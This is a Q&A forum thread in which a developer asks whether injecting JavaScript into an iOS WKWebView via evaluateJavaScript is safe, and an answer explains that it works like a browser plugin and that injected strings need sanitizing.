2

I am using Webview on an application for some of the views we show. I have been tasked with finding a way to listen back to the native platform response, in this case, the iOS system.

My iOS developer shows me a POC using evaluateJavaScript ref link.

func evaluateJavaScript(
    _ javaScriptString: String,
    completionHandler: ((Any?, Error?) -> Void)? = nil
)

In this method, by adding to a DOM element an id, we can inject the script back into the DOM and execute it.

When I hear "injection of script" I get a bit worried about the security. I tried to look around and didn't find something reassuring.

Who can advise? Is this safe? Can the action be hacked and used to inject malicious script back?

RoHaN
  • 372
  • 3
  • 14
user24136
  • 135
  • 4
  • 13

1 Answers1

2

This is a pretty broad question so you will probably only getting opinionated answers, but I guess I will take a shot here.

In essence, the term "injection" here is surely technically correct, but has an unfortunate overlap with any injection that is part of the common attacks we see on websites of any kind.

I'd argue that in this case, however, the term describes functionality that is more like a browser plugin (or even the general behavior of a browser): Your app (which the WKWebView is a part of) acts as a browser and whatever script you then inject into any site is naturally part of that browser.

That's no different from a Chrome plug-in or even certain parts of the default behavior of some browsers that may modify a site's behavior by default.

Of course that means it is your job to ensure that the script you inject is properly sanitized. If, for example, you allow users in your app to enter arbitrary strings to be used in that script you open the door to badness.

Most use-cases that I'd see are probably safe (or can be done safely) in that they do not simply allow arbitrary script code (and strings are properly escaped).

I am not quite sure I understand the last part when you ask "Can the action be hacked and used to inject malicious script back?":

If you are worried that an attacker might highjack your app and use evaluateJavaScript(_:completionHandler:) method to inject code into a website you're basically saying that you are concerned about an attacker compromising your app? If there was a different exploit allowing someone to use your app to gain some kind of RCE privileges we are talking about an entirely different problem. Simply having that functionality in your app on its own does not make that more or less likely, however.

As said, it all depends on what script you inject and what the website does (with or without it).

Side tangent:

In fact, if you tightly integrate some web content into an app and want the native code to interact with the website and vice-versa, java script injection is necessary and the designated way to do so. I'd probably go for the mechanics provided via the WKWebView's userContentController and WKUserScript objects and so forth. There you also find the "other way around", i.e. a mechanic to call code in your native app by invoking a javascript handler in the website.

Gero
  • 4,394
  • 20
  • 36
  • 1
    Gero, thank you for the details and well describe answer. My concern is indeed the attacker passing javascript code. you are right when said it doesn't mean more or less but it can be an entry point that I don't to give away. Thanks – user24136 May 22 '23 at 11:58